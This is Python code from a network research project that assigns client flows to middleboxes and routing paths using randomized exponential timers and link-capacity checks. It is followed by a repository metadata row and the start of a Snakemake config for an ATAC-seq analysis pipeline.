pass##self.LogRun.write( '\t\t ~~ after UnBind ~~ self.MBoxSet_assigned[ %d ]: %s \n'%(Mbox_ID, self.MBoxSet_assigned[Mbox_ID]) )
### ---- 2. Update the resouces information of host-MBox.
current_Cap_MBox = self.Cap_MBoxes[Mbox_ID];
consumed_Cap_by_CFlow = float(self.TDSet[CFlow_ID]);
self.Cap_MBoxes[Mbox_ID] = current_Cap_MBox + consumed_Cap_by_CFlow## --- End of this function :~
# ================================================
def Check_whether_tarMBox_feasible_to_a_CFlow(self,id_CFlow, id_tarMBox):
#global self.Cap_MBoxes;
ret_Status_feasible = 0## initialized to 0(false)
TD_CFlow = float(self.TDSet[id_CFlow]);
availabl_Cap_tarMBox = self.Cap_MBoxes[id_tarMBox];
if (availabl_Cap_tarMBox > 0) and (availabl_Cap_tarMBox - TD_CFlow >= 0):
ret_Status_feasible = 1##(1 represents true)
return int(ret_Status_feasible)## --- End of this function :~
# ================================================
    def Select_a_rdm_feasible_NIU_MBox_for_the_targetCFlow(self,Src_CFlow_ID):
        """Randomly pick a not-in-use (NIU) middlebox that can feasibly host
        Src_CFlow_ID; return its id, or -1 when no feasible NIU box exists.

        Uses rejection sampling over the NIU list: draws random boxes until a
        feasible one is found or every box has been checked infeasible.
        NOTE(review): a draw may hit an already-checked box and is then simply
        re-drawn, so the loop can iterate more times than len(list_MBoxes_NIU).
        """
        ret_MBoxID_NIU = -1; ## If cannot find one, return a -1, which will incur a definite error.
        ## -- 1. get the list_NIU_MBoxes corresponding to this Src_CFlow.
        list_MBoxes_NIU = self.Get_list_of_NIU_MBoxes_corresponding_to_the_Src(Src_CFlow_ID);
        ## -- 2. rdmly pick up one from the list, until it is a feasible one.
        list_MBoxes_NIU_checked = [];
        while ( len(list_MBoxes_NIU_checked) < len(list_MBoxes_NIU) ):
            CNT_MBoxes_NIU = len(list_MBoxes_NIU);
            if CNT_MBoxes_NIU == 0:
                return -1### Not found even one MB_NIU.
            if CNT_MBoxes_NIU >= 1:
                idx_targetMBox = random.randint(0,CNT_MBoxes_NIU-1);
                rdm_MBoxID_NIU = list_MBoxes_NIU[idx_targetMBox];
                if ( rdm_MBoxID_NIU not in list_MBoxes_NIU_checked ):
                    bool_whether_tarMBox_feasible = self.Check_whether_tarMBox_feasible_to_a_CFlow(Src_CFlow_ID, rdm_MBoxID_NIU);
                    if (1==bool_whether_tarMBox_feasible):
                        ret_MBoxID_NIU = rdm_MBoxID_NIU
                        return ret_MBoxID_NIU### Return it directly.
                    else:### Not feasible
                        list_MBoxes_NIU_checked.append(rdm_MBoxID_NIU)### End of while :~
        # if (-1==ret_MBoxID_NIU):
        #     print list_MBoxes_NIU_checked
        #     print list_MBoxes_NIU
        return ret_MBoxID_NIU## --- End of this function :~
# ================================================
def Select_a_rdm_NIU_MBox_for_the_targetCFlow(self,Src_CFlow_ID):
ret_MBoxID_NIU = -1; ## If cannot find one, return a -1, which will incur a definite error.
## -- 1. get the list_NIU_MBoxes corresponding to this Src_CFlow.
list_MBoxes_NIU = self.Get_list_of_NIU_MBoxes_corresponding_to_the_Src(Src_CFlow_ID);
## -- 2. pick up one rdmly from the list.
CNT_MBoxes_NIU = len(list_MBoxes_NIU);
if CNT_MBoxes_NIU >= 1:
idx_targetMBox = random.randint(0,CNT_MBoxes_NIU-1);
ret_MBoxID_NIU = list_MBoxes_NIU[idx_targetMBox];
return ret_MBoxID_NIU## --- End of this function :~
# ================================================
def Get_list_of_NIU_MBoxes_corresponding_to_the_Src(self,Src_CFlow_ID):
## -- 1. get the holding MBox_ID corresponding to this Src_CFlow.
Host_MBoxID_of_the_Src = self.find_holding_MBox_of_a_SrcCFlow(Src_CFlow_ID);
## -- 2. filter all the MBoxes.
list_MBox_not_in_use = [MBox for MBox in self.list_MBoxDst_id if MBox != Host_MBoxID_of_the_Src ];
return list_MBox_not_in_use## --- End of this function :~
# ================================================
def find_holding_MBox_of_a_SrcCFlow(self,Src_CFlow_ID):
ret_holding_MB_id = -1;
for key,val in self.MBoxSet_assigned.items():
list_binded_SrcCF_IDs = val;
if Src_CFlow_ID in list_binded_SrcCF_IDs:
ret_holding_MB_id = key
return ret_holding_MB_id## -- End of this function :~
# ================================================
def find_currently_selected_pathID_of_a_SrcCFlow(self,Src_CFlow_ID):
ret_cur_selected_pathID_id = -1;
#global self.PathSet_selected
for key,val in self.PathSet_selected.items():
if Src_CFlow_ID==key[0]:
list_assigned_path_IDs = val;
if len(list_assigned_path_IDs)>0:
ret_cur_selected_pathID_id = list_assigned_path_IDs[0];#### !!!! HERE: just take the first path.
return ret_cur_selected_pathID_id## -- End of this function :~
# ================================================
def Get_the_current_selected_MBoxID_and_PathID_of_SrcCFlow(self,Src):
retMBoxID = self.find_holding_MBox_of_a_SrcCFlow(Src);
retPathID = self.find_currently_selected_pathID_of_a_SrcCFlow(Src);
return retMBoxID,retPathID## -- End of this function :~
# ================================================
# ================================================
def Get_max_value_of_a_dict(self, dict ):
dictTemp={v:k for k,v in dict.items()}
return dict[ dictTemp[max(dictTemp)] ]
# ================================================
def Get_min_value_of_a_dict(self, dict ):
dictTemp={v:k for k,v in dict.items()}
return dict[ dictTemp[min(dictTemp)] ]
# ================================================
# ==========================================================================================
def get_size_of_Js(self, Src, Dst ):## { Get the Number_of_candidate_paths_for_this_pair(Src,Dst)}, the info of self.PathSet_cand.
retNum_Paths_of_this_session = 0;
for key,val in self.PathSet_cand.items():
Src0 = key[0];
Dst0 = key[1];
if Src0==Src and Dst0==Dst:
retNum_Paths_of_this_session = len(val);
return retNum_Paths_of_this_session## --- End of this function :~
# ==========================================================================================
def get_size_of_Ds(self, Src, Dst ):## { Get the Number_of_In-Use_paths_for_this_pair(Src,Dst)}, the info of self.PathSet_selected.
retNum_Paths_of_this_session = 0;
#global self.PathSet_selected
for key,val in self.PathSet_selected.items():
Src0 = key[0];
Dst0 = key[1];
if Src0==Src and Dst0==Dst:
retNum_Paths_of_this_session = len(val);
return retNum_Paths_of_this_session## --- End of this function :~
# ==========================================================================================
def Check_expiration_of_timers(self, Current_ts ):## Returned value: 1: timer expires; 0: not.
#global self.Timers;
ret_timer_result = {} ## {(SrcCFlow):[pathID_old, pathID_new, Dst_MBox_old, Dst_MBox_new]}
# check each timer
for Src,val in self.Timers.items():
Ts_begin = val[0];
Len_timer = val[1];
pathID_old = val[2];
pathID_new = val[3];
Dst_MBox_old = val[4];
Dst_MBox_new = val[5];
if ( Current_ts >= Ts_begin+Len_timer ):
if Src not in ret_timer_result.keys():
pass##self.LogRun.write( '\n======&&====== TimerOut: Src[ %d ] Ts_begin[ %s ] Len_timer[ %s ] DstMBox_old[ %s ] DstMBox_new[ %s ].'%(Src, Ts_begin, Len_timer, Dst_MBox_old, Dst_MBox_new) )
ret_timer_result[Src]=[-1,-1,-1,-1];
ret_timer_result[Src][0] = pathID_old;
ret_timer_result[Src][1] = pathID_new;
ret_timer_result[Src][2] = Dst_MBox_old;
ret_timer_result[Src][3] = Dst_MBox_new;
return ret_timer_result## --- End of this function :~
# ==========================================================================================
def Get_a_rdm_pathID_NIU_from_CandidatePathSet(self,Src, Dst): ## NIU: Not-In-Use.
ret_pathID_NIU = 0;
list_paths_NIU = self.Get_list_of_pathIDs_not_in_use(Src, Dst);
CNT_paths_NIU = len(list_paths_NIU);
if CNT_paths_NIU >= 1:
idx_targetNewPath = random.randint(0,CNT_paths_NIU-1);
ret_pathID_NIU = list_paths_NIU[idx_targetNewPath];
return ret_pathID_NIU## --- End of this function :~
def Get_list_of_pathIDs_not_in_use(self,Src, Dst): ## pair of (Src, Dst).
#global self.PathSet_cand, self.PathSet_selected;
list_paths_not_in_use = [];
listPaths_cand = self.PathSet_cand[(Src,Dst)];
list_paths_in_use = [];
if (Src,Dst) in self.PathSet_selected.keys():#### !!!! Check whether this s-d exists in the Path_assigned.
list_paths_in_use = self.PathSet_selected[(Src,Dst)];
for path_cand in listPaths_cand:
if path_cand not in list_paths_in_use:
list_paths_not_in_use.append( path_cand );
return list_paths_not_in_use## --- End of this function :~
def Get_a_rdm_pathID_IU_from_SeletedPathSet(self,Src, Dst): ## IU: In-Use.
#global self.PathSet_selected;
ret_pathID_IU = 0;
CNT_paths_of_this_pair = len(self.PathSet_selected[(Src,Dst)]);
if CNT_paths_of_this_pair >= 1:
idx_Path_IU = random.randint(0,CNT_paths_of_this_pair-1);
ret_pathID_IU = self.PathSet_selected[(Src,Dst)][idx_Path_IU];
return ret_pathID_IU## --- End of this function :~
def Get_num_of_IU_paths_of_a_session(self,Src, Dst): ## IU: In-Use.
#global self.PathSet_selected;
ret_num_IU = 0;
ret_num_IU = len(self.PathSet_selected[(Src,Dst)]);
return ret_num_IU## --- End of this function :~
# ==========================================================================================
def Get_objVal_of_configurations_in_whole_system(self):
#global self.PathSet_selected;
ret_system_throughput = 0
dict_all_satisfied_CF = {}
for SrcCF,DstMB in self.PathSet_selected.keys():
if (len(self.PathSet_selected[(SrcCF,DstMB)])==1) and (SrcCF not in dict_all_satisfied_CF.keys()):
dict_all_satisfied_CF[SrcCF] = 1##(1 is not important)
for key in dict_all_satisfied_CF.keys():
ret_system_throughput += self.TDSet[key]
return ret_system_throughput## --- End of this function :~
# ==========================================================================================
    def Get_largest_utility_of_both_links_and_nodes(self):
        """Return (max link load, max node rule count) over the current solution.

        Walks every selected path, accumulating each flow's demand on every
        directed link of the path and one rule per node appearance. Both
        accumulators are pre-initialized to zero for all known links/nodes, so
        the max also reflects completely unused links (load 0.0) and nodes.
        NOTE(review): because every known node starts at 0 and the else-branch
        increments, each node appearance on a path adds exactly 1 rule.
        """
        #global self.PathSet_selected;
        #### ------ 0. Define necessary dicts.
        dict_LinkLoad = {}; ## {(u,v):loadVal}, a dict which records the sum-traffic-load in each arc.
        for (u,v) in self.Cap_links.keys():
            if (u,v) not in dict_LinkLoad.keys():
                dict_LinkLoad[(u,v)] = 0.0;### -- !!! Initialization, otherwise, the total-link-cost will be smaller.
        dict_NodeLoad = {}; ## {(u):loadVal}, a dict which records the sum-num-rules-load in each node.
        for u in self.Nodes_set:
            if u not in dict_NodeLoad.keys():
                dict_NodeLoad[u] = 0;### -- !!! Initialization is necessary.
        ## -- 1. Analyse each selected-path in val, get and record all arc-links and nodes in this path.
        for key,val in self.PathSet_selected.items():
            for idx_pathID in range(0, len(val)):
                path_id = val[idx_pathID];
                listPath_i = self.Paths_set[path_id];
                # Walk consecutive node pairs (u, v) along the path.
                for node_idx in range(len(listPath_i)):
                    if (node_idx+1) < len(listPath_i):
                        u = listPath_i[node_idx];
                        v = listPath_i[node_idx+1];
                        ## -- 1.1 record links travelled.
                        if (u,v) not in dict_LinkLoad.keys():
                            dict_LinkLoad[(u,v)] = self.TDSet[key[0]];
                        else:
                            dict_LinkLoad[(u,v)] += self.TDSet[key[0]];
                        ## -- 1.2 record all the nodes in the links travelled.
                        if u not in dict_NodeLoad.keys():
                            dict_NodeLoad[u] = 0;
                        else:
                            dict_NodeLoad[u] += 1;
                        if v not in dict_NodeLoad.keys():
                            dict_NodeLoad[v] = 0;
                        else:
                            dict_NodeLoad[v] += 1;
        ## -- 2. Calculate the ObjVal based on LinkLoad.
        Ret_largest_linkCost = self.Get_max_value_of_a_dict(dict_LinkLoad);
        ## -- 3. Find the node which owns the largest holding rules based on dict_NodeLoad.
        Ret_largest_ruleCost = self.Get_max_value_of_a_dict(dict_NodeLoad);
        ### -- 3. Return them.
        return Ret_largest_linkCost,Ret_largest_ruleCost### --- End of this function :~
# ==========================================================================================
# ==========================================================================================
    def Set_timer_for_one_CFlow(self,Src, Current_ts):
        """Arm an exponentially-distributed reconfiguration timer for Src.

        Randomly picks a feasible not-in-use (NIU) middlebox and path for the
        client flow, estimates the throughput after such a move, derives the
        timer's mean from exp(Tau - 0.5*Beta*delta_throughput), and stores
        the pending move in self.Timers[Src] as
        [set_ts, timer_val, old_path, new_path, old_mbox, new_mbox].
        Does nothing if no feasible middlebox is found.
        """
        pass##self.LogRun.write( '\n ####### Try to set timer for Src-CFlow[ %d ], at ts [ %s ]:'%(Src, Current_ts) )
        ### ===== A. rdmly select a NIU MBox for this traget-ClientFlow.
        feasible_DstMBox_rdm = self.Select_a_rdm_feasible_NIU_MBox_for_the_targetCFlow(Src);
        if (-1==feasible_DstMBox_rdm):
            return#### If -1 is returned: cannot find a feasible MBox for this Src, so, do nothing for it.
        ### ===== B. if the feasible Dst_MBox-sw is found, pick one path for this pair(Src, Dst).
        pass##self.LogRun.write( '\n\t---- Src-CFlow[ %d ] finds out a feasible DstMBox[ %d ]\n'%(Src,feasible_DstMBox_rdm) )
        ### ===== (Rdmly/Greedly) Find a routing path for this SD-pair.
        Dst_new = feasible_DstMBox_rdm;
        # -- 1. Get the_current_selected_MBoxID_and_pathID_of_SrcCFlow, denoted as DstMBox_old and PathID_old;
        DstMBox_old,PathID_old = self.Get_the_current_selected_MBoxID_and_PathID_of_SrcCFlow(Src);
        # -- 2. Select one from |Js|-Ds its Not-in-Use paths, denoted as l_new;
        PathID_new = self.Get_a_rdm_pathID_NIU_from_CandidatePathSet(Src, Dst_new);
        # -- 3. Get the current Throughput before swapping the host-MBox and path;
        Throughput = self.Get_objVal_of_configurations_in_whole_system();
        # -- 4. Fake-Replace the host-MBox and Path, only for estimating the next-config-objVal.
        pass##self.LogRun.write( '\n\t ####$$-- Fake_Replace, begin: Src[ %d ] - DstMBox_new[ %d ]\n'%(Src, Dst_new) )
        Throughput_predicted = self.Fake_Replace_DstMBox_and_Path_for_a_SrcCFlow_to_return_estimated_sysObj(Src, DstMBox_old, Dst_new, PathID_old, PathID_new);
        ## -- 5. generate an exponentially distributed random timer-value with
        ##        mean that is equal to (1/lambda_exp_random_number_seed), and record it into self.Timers.
        # print 'Throughput: %f\tThroughput_predicted: %f'%(Throughput, Throughput_predicted)
        # A predicted throughput gain shrinks exp_item, so better moves get shorter timers.
        exp_item = math.exp(self.Tau - 0.5*self.Beta*(Throughput_predicted-Throughput));
        mean_timer_exp = 1.0*exp_item/(len(self.list_MBoxDst_id)-1);
        lambda_exp_random_number_seed = 1.0/mean_timer_exp;
        Timer_val_exp = random.expovariate( lambda_exp_random_number_seed );#### Generate a random exponentially-distibuted timer for the current Client-Flow.
        # print 'exp_item: %f\t lambda_exp: %f\t Timer_val_exp: %f'%(exp_item, lambda_exp_random_number_seed, Timer_val_exp)
        ### For debuging :
        # if DstMBox_old < 0:
        #    pass##self.LogRun.write( '\n\t\t--NOTE-- when DstMBox_old =-1:\n\t\t\tSrc-CFlow[ %d ] -Throughput[ %s ] -Throughput_predicted[ %s ] -lambda_exp_random_number_seed[ %s ] -Timer_val_exp[ %s ]\n'%(Src,Throughput,Throughput_predicted,lambda_exp_random_number_seed,Timer_val_exp) )
        ### For debuging :~
        ## -- 6. Record the necessary information into self.Timers.
        DstMBox_current = DstMBox_old;
        if (Src) not in self.Timers.keys(): ### --- Record 6-items information for this Src.
            self.Timers[Src] = [0,0,-1,-1,-1,-1];### Initialization
            self.Timers[Src][0] = Current_ts;
            self.Timers[Src][1] = Timer_val_exp
            self.Timers[Src][2] = PathID_old
            self.Timers[Src][3] = PathID_new
            self.Timers[Src][4] = DstMBox_current
            self.Timers[Src][5] = Dst_new
        else: ### !!!! Do not forget updating the relevant paths-info when this Src has already been exiting.
            self.Timers[Src][0] = Current_ts;
            self.Timers[Src][1] = Timer_val_exp
            self.Timers[Src][2] = PathID_old
            self.Timers[Src][3] = PathID_new
            self.Timers[Src][4] = DstMBox_current
            self.Timers[Src][5] = Dst_new# --- End of this function :~
# ==========================================================================================
def Set_timer_for_all_CFlows(self,Current_ts):
for Src in self.list_CFlowSrc_id:
self.Set_timer_for_one_CFlow(Src, Current_ts)# --- End of this function :~
# ==========================================================================================
def RESET(self,Current_ts):
self.Set_timer_for_all_CFlows(Current_ts)# --- End of this function :~
# ==========================================================================================
# ==========================================================================================
def Replace_the_selected_DstMBox_and_Path_for_a_SrcCFlow(self,Src, Dst_old, Dst_new, PathID_old, PathID_new):
#global self.PathSet_selected
#### !!!!! ===== 1. Swap the Dst_MBoxes for CFlow: Remove the OLD MBox, Add the NEW.
self.MBox_removes_a_CFlow( Dst_old, Src );
self.MBox_trys_to_host_a_CFlow( Dst_new, Src );
#### !!!!! ===== 2. Adopt the NEW path for Src.
#### !!!!! ===== 2.1 Remove all the OLD paths for Src.
for (SrcCF,DstMB) in self.PathSet_selected.keys():
if SrcCF == Src:
del self.PathSet_selected[(SrcCF,DstMB)]; ##此处为什么要删除
#### !!!!! ===== 2.2 Adopt the NEW path for Src.
#### -------- !! Before using the new-path, check whether it is feasible to this Src_CFlow.
#### ---- if it is not feasible: this SrcCFlow will not have a routing-path!!
bool_whether_this_new_path_is_feasible = self.Check_whether_this_new_path_is_feasible_to_the_SrcCFlow(Src,Dst_new,PathID_new);
if 1==bool_whether_this_new_path_is_feasible:
### !!!! --- 2.2.1 Check whether this key exists.
if (Src,Dst_new) not in self.PathSet_selected.keys():
self.PathSet_selected[(Src,Dst_new)] = []; ##self.PathSet_selected???????
### !!!! --- 2.2.2 Adopt this one.
#print "test begin4"
#print "PathID_new"+" "+PathID_new+"\n"
#print "PathID_new not in self.PathSet_selected[(Src,Dst_new)]"+" "+PathID_new not in self.PathSet_selected[(Src,Dst_new)]
if PathID_new>=0 and (PathID_new not in self.PathSet_selected[(Src,Dst_new)]):
#print "test bedin3"
self.PathSet_selected[(Src,Dst_new)].append(PathID_new)
#print "test end3"
#print "test end4"
#### !!!!! ===== 2.3 Filter and Delete irregular path-items.
for (SrcCF,DstMB) in self.PathSet_selected.keys():
Host_DstMB_of_this_SrcCF = self.find_holding_MBox_of_a_SrcCFlow(SrcCF);
if (DstMB != Host_DstMB_of_this_SrcCF):
del self.PathSet_selected[(SrcCF,DstMB)]### --- End of this function :~
# ==========================================================================================
# ==========================================================================================
def Delete_expired_timer_items_after_replacement(self,Src_CFlow):
#global self.Timers;
if Src_CFlow in self.Timers.keys():
del self.Timers[Src_CFlow]### --- End of this function :~
# ==========================================================================================
# ==========================================================================================
##### In this function, I only check the link bandwidth is feasible or not.
    def Check_whether_this_new_path_is_feasible_to_the_SrcCFlow(self,Src,Dst_new,Path_ID_new):
        """Return 1 if every arc of path Path_ID_new has enough spare bandwidth
        for Src's traffic demand, else 0.

        Spare bandwidth per arc comes either from internal simulation state
        (self.Style_of_throughput_by_simulation_or_Mininet == 1) or from live
        Mininet measurements (== 0). Only link bandwidth is checked here;
        Dst_new is accepted for interface symmetry but not used.
        """
        ##(0 is false, 1 is true)
        #self.Log_debug.write("\n\t ============ !!! In Check_whether_this_new_path Function, ---- Path_ID_new"+" "+str(Path_ID_new))
        # Invalid path ids (e.g. -1 sentinel) are never feasible.
        if Path_ID_new<0:
            return 0
        #self.f1.write("\n Location 333333333333333 \n")
        ## --- 1. get all the traversing arcs in the new path.
        list_arcs_in_this_path = self.Get_all_arcs_in_a_specified_path( Path_ID_new );
        #self.Log_debug.write("\n\tlist_arcs_in_this_path"+" "+str(list_arcs_in_this_path)+"\n" )
        ## --- 2. calculate all the currently-accumulative-assigned TrafficRate(TR) in each traversed arc.
        #self.Log_debug.write("\n\t ----- location 0 \n" )
        #self.f1.write("\n Location 6666666666666 \n")
        ## --- 2.1 Check the traffic-rate in each arc of this path.
        for (u,v) in list_arcs_in_this_path:
            available_TR_in_uv = 0.0
            summed_TR_in_uv = 0.0###Initialized to 0.
            ## -- 2.1.1 Get the available-tr-in-uv in the simulation-manner.(2016-01-27)
            if (1 == self.Style_of_throughput_by_simulation_or_Mininet):
                ## 2.1.1.1 summate all the traffic-rate in (u,v).
                #self.f1.write("\n Location 77777777777 \n")
                # Sum the demand of every selected path that traverses arc (u,v).
                for key,val in self.PathSet_selected.items():
                    #self.f1.write("\n Location 77777777777-2222 \n")
                    src = key[0]
                    if (len(val)>0):
                        for idx_pathID in range(0, len(val)):
                            path_IU_sdi = val[idx_pathID];
                            #self.Log_debug.write("\n\t ----- location 1 \n" )
                            list_arcs_in_path_sdi = self.Get_all_arcs_in_a_specified_path( path_IU_sdi );
                            #self.Log_debug.write("\n\t ----- location 2 \n" )
                            if (u,v) in list_arcs_in_path_sdi:
                                summed_TR_in_uv += self.TDSet[src];
                ## 2.1.1.2 get the available_TR_in_uv.
                available_TR_in_uv = self.Cap_links[(u,v)] - summed_TR_in_uv;## This is the simulation-style.
                self.Log_debug.write("\t------------- 2.1.1.2 summed_TR_in_uv_estimated_in_simulation: "
                                     + str(summed_TR_in_uv)+"\n")
                self.Log_debug.flush()
            ## -- 2.1.1-ver2: Get the available-tr-in-uv in the emulation(mininet-running)-manner.(2016-01-27)
            elif (0 == self.Style_of_throughput_by_simulation_or_Mininet):
                summed_TR_in_uv = self.objNetworkMonitor.get_used_bw(u,v);
                available_TR_in_uv = self.Cap_links[(u,v)] - summed_TR_in_uv;
                self.Log_debug.write("\t------------- 2.1.1-ver2 summed_TR_in_uv_measured_in_mininet: "
                                     + str(summed_TR_in_uv)+"\n")
                self.Log_debug.flush()
            ## -- 2.1.2 Compare the available TR bandwidth in each arc with the demanding TR of this Src_CFlow.
            demanding_TR_of_SrcCFlow = self.TDSet[Src];
            if ( demanding_TR_of_SrcCFlow > available_TR_in_uv ):
                return 0### Cannot statisfy this SrcCFlow, return false.
        ## --- 3. If all arcs in this path can satisfy this SrcCFlow, return 1(Yes).
        #self.f1.write("\n Location 8888888888888 \n")
        return 1
        ### --- End of this function :~
# ==========================================================================================
# ==========================================================================================
## This function is for estimating the throughput-performance of the "next" state, if swap a pair of paths(one In-Use(IU) path and one Not-In-Use(NIU) path).
def Fake_Replace_DstMBox_and_Path_for_a_SrcCFlow_to_return_estimated_sysObj(self,Src, DstMBox_old, Dst_new, PathID_old, PathID_new):
# -- 1. Fake-Replace the host-MBox and Path, only for estimating the next-config-objVal.
self.Replace_the_selected_DstMBox_and_Path_for_a_SrcCFlow(Src, DstMBox_old, Dst_new, PathID_old, PathID_new);
# -- 2. ESTIMATE the Throughput' after swapping the host-MBox and path;
estimated_sysObj = self.Get_objVal_of_configurations_in_whole_system();
# -- 3. Swap-BACK of the host-MBox and Path, after estimating the next-config-objVal.
self.Replace_the_selected_DstMBox_and_Path_for_a_SrcCFlow(Src, Dst_new, DstMBox_old, PathID_new, PathID_old);
return estimated_sysObj# --- End of this function :~
# ==========================================================================================
# ==========================================================================================
def Get_all_arcs_in_a_specified_path(self, path_id ):
retlist_Arcs = []; ## [ arcs_(u,v) in this path]
## -- 1. Analyse and record all arc-links in this path.
if path_id in self.Paths_set.keys():
list_path_content = self.Paths_set[path_id];
## -- 1.1 ## Analyze all arcs in this path.
for node_idx in range(len(list_path_content)):
if (node_idx+1) < len(list_path_content):
u = list_path_content[node_idx];
v = list_path_content[node_idx+1];
## -- 1.2 ## Record this arcs_list into retList.
if (u,v) not in retlist_Arcs:
retlist_Arcs.append((u,v));
## -- 2. Return the obtained linksSet in this path.
return retlist_Arcs## --- End of this function :~
# ==========================================================================================
# ==========================================================================================
def Get_all_arcs_in_each_path_from_given_pathSet(self, dictPathSet ):
#### ------ Get all the arcs in given dictPathSet.
retDict_Arcs_in_each_Path = {}; ## {(Src,Dst, path_id):[ arcs_(u,v) in this path] }, the arcs in path-set for all pairs.
## -- 1. Analyse each selected-path in val, get and record all arc-links in this path.
for key,val in dictPathSet.items():
Src = key[0]
Dst = key[1]
for idx_pathID in range(0, len(val)):
path_id = val[idx_pathID];
listPath_i = self.Paths_set[path_id];
## -- 1.1 ## Record all arcs in this path.
for node_idx in range(len(listPath_i)):
if (node_idx+1) < len(listPath_i):
u = listPath_i[node_idx];
v = listPath_i[node_idx+1];
## -- 1.1.2 ## Record this arcs_list into retDict.
if (Src,Dst,path_id) not in retDict_Arcs_in_each_Path.keys():
retDict_Arcs_in_each_Path[(Src,Dst,path_id)] = [];
retDict_Arcs_in_each_Path[(Src,Dst,path_id)].append((u,v));
else:
retDict_Arcs_in_each_Path[(Src,Dst,path_id)].append((u,v));
## -- 2. Return the obtained linksSet in each path.
return retDict_Arcs_in_each_Path## --- End of this function :~
# ==========================================================================================
def Whether_the_given_arc_in_this_ArcSetOfAPath(self, pairGivenArc, listArcs_in_a_path ):
ret_status = 0; ## 0: no; 1:yes.
for arc in listArcs_in_a_path:
if arc[0]==pairGivenArc[0] and arc[1]==pairGivenArc[1]: ## (u,v) == (u,v)
return 1;
return ret_status## --- End of this function :~
# ==========================================================================================
def Remove_a_path_from_pathSet(self, path_id, pathSet, key_in_pathSet ):
pathSet[key_in_pathSet].remove(path_id)## --- End of this function :~
# ==========================================================================================
# ==========================================================================================
    def Call_and_record_system_performance(self, current_ts, step_times, Cumulative_RESET_times, Cumulative_TimerExpiration_times):
        """Sample the current throughput plus the max link/node utilisation and
        append one tab-separated record (with the passed counters and Beta)
        to self.Log."""
        #### --- 1. Get the global system utility.
        Throughput = self.Get_objVal_of_configurations_in_whole_system();
        #### --- 2. Get the largest link utility.
        Largest_link_utility = 0;
        Largest_node_utility = 0;
        Largest_link_utility,Largest_node_utility = self.Get_largest_utility_of_both_links_and_nodes();
        #### --- 3. Get the largest node utility.
        #### --- Last. Record them together.
        self.Log.write('-ts\t%f\t-steps\t%d\t-Throughput\t%f\t-CNT_reset\t%d\t-CNT_TimerExpiration\t%d\t-MaxLinkCost\t%f\t-MaxNodeCost\t%f\t-self.Beta\t%s\n'%(current_ts, step_times, Throughput, Cumulative_RESET_times, Cumulative_TimerExpiration_times, Largest_link_utility, Largest_node_utility,self.Beta ))# --- End of this function :~
# ==========================================================================================
# ==========================================================================================
    def Write_down_the_current_solution_MBox_Path_assignment(self, Current_ts ):
        """Dump the current solution to self.LogRun: the throughput, each
        middlebox's assigned client flows, and each (flow, middlebox) pair's
        selected path ids."""
        Throughput = self.Get_objVal_of_configurations_in_whole_system();
        self.LogRun.write( '\n\t ==================== Solutions at -current-TS[ %s ] -Throughput[ %s ] ==================== \n'%(Current_ts,Throughput))
        ### ---- 1. Solution of Middle-box
        self.LogRun.write('#### MiddleBox-id : [list of the assigned Src-ClientFlow-id]\n')
        for Mbox_ID in self.MBoxSet_assigned.keys():
            self.LogRun.write( '\t\t ~~~~ self.MBoxSet_assigned[ %s ]: %s \n'%(Mbox_ID, self.MBoxSet_assigned[Mbox_ID]) )
        ### ---- 2. Solution of Path selection
        self.LogRun.write('\n#### Src-ClientFlow-id, DstMiddleBox-id : selected-path-id\n')
        #print self.PathSet_selected.keys ##by gzq
        #print self.PathSet_selected.items ##by gzq
        #print self.PathSet_selected.values ##by gzq
        for key,val in self.PathSet_selected.items():
            SrcCF = key[0]
            DstMB = key[1]
            listPath = val
            self.LogRun.write( '\t\t ~~~~ SrcCF[ %s ] DstMB[ %s ]: %s \n'%(SrcCF,DstMB,listPath ) )
# ==========================================================================================
    def Record_final_result(self,current_ts, step_times, Cumulative_RESET_times, Cumulative_TimerExpiration_times):
        """Compute the final metrics: throughput, max link/node utilisation,
        and the QoS-satisfaction ratio (fraction of client flows holding at
        least one valid path).

        Assumes self.TDSet is non-empty (QSR divides by its length).
        """
        #global self.PathSet_selected
        #### --- 1. Get the global system utility.
        Throughput = self.Get_objVal_of_configurations_in_whole_system();
        #### --- 2. Get the largest link/node utility.
        Largest_link_utility = 0;
        Largest_node_utility = 0;
        Largest_link_utility,Largest_node_utility = self.Get_largest_utility_of_both_links_and_nodes();
        #### --- 3. Record them together.
        ###### ---- 3.1 calculate the Qos-Satisfication-Ratio (QSR) over all ClientFlows (TDs)
        TotalNum_TDs = len(self.TDSet);
        Num_satisfied_TDs = 0;
        # A flow counts as satisfied when it holds at least one non-negative path id.
        for val in self.PathSet_selected.values():
            if len(val) > 0 and val[0] >= 0:
                Num_satisfied_TDs += 1;
        QSR = (1.0*Num_satisfied_TDs)/TotalNum_TDs;
        ###### ---- 3.2 record them all
        # NOTE(review): the write below is commented out, so this method
        # currently computes everything but persists nothing -- confirm intended.
        #self.Log_final_result.write('-ts\t%f\t-steps\t%d\t-Throughput\t%f\t-CNT_reset\t%d\t-CNT_TimerExpiration\t%d\t-MaxLinkCost\t%f\t-MaxNodeCost\t%f\t-self.Beta\t%s\t-QSR\t%f\t-CapLink\t%f\n'%(current_ts, step_times, Throughput, Cumulative_RESET_times, Cumulative_TimerExpiration_times, Largest_link_utility, Largest_node_utility,self.Beta,QSR,self.Cap_links["0000000000000003","0000000000000002"] ))# --- End of this function :~
# ==========================================================================================
##############################################################################################
# ========================================= USE-CASE =========================================
| [
"zhiqiangguo0727@163.com"
] | zhiqiangguo0727@163.com |
db23d33034ebba116edc28042f519ac25f386964 | 0811c142b31feca2800c615dc148eb8de8aaabcc | /ATAC_seq/Snakefile | 9d6c3dba7adbee05d0b70323f576457266260353 | [] | no_license | kwells4/ATAC_RNA_Tonsils | 2254d279ec420b4531c844d2c064717f1981a306 | 1d335ceab56aff81c80b027a7bf3f03af9abec6f | refs/heads/master | 2023-04-13T20:46:32.008885 | 2021-04-28T23:42:00 | 2021-04-28T23:42:00 | 361,899,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,868 | from snakemake.utils import min_version
##### set minimum snakemake version #####
min_version("5.1.4")
##### load config file #####
configfile: "config.yaml"
# ATAC cluster labels consumed by rule bam_clusters when splitting BAMs per cluster.
CLUSTERS = ["C1", "C2", "C3", "C4", "C5", "C6", "C7", "C8", "C9", "C10", "C11", "C12", "C13", "C14"]
def make_fastq_list(wildcards):
    """Join each run's mkfastq output folder into one comma-separated string.

    Snakemake passes `wildcards` to input/params functions; it is unused here.
    """
    per_run_paths = []
    for run_name in config["run_names"]:
        per_run_paths.append(run_name + "/" + run_name + "_mkfastq/outs/fastq_path")
    return ",".join(per_run_paths)
# Default target: cellranger-atac count output folder for every sample.
rule all:
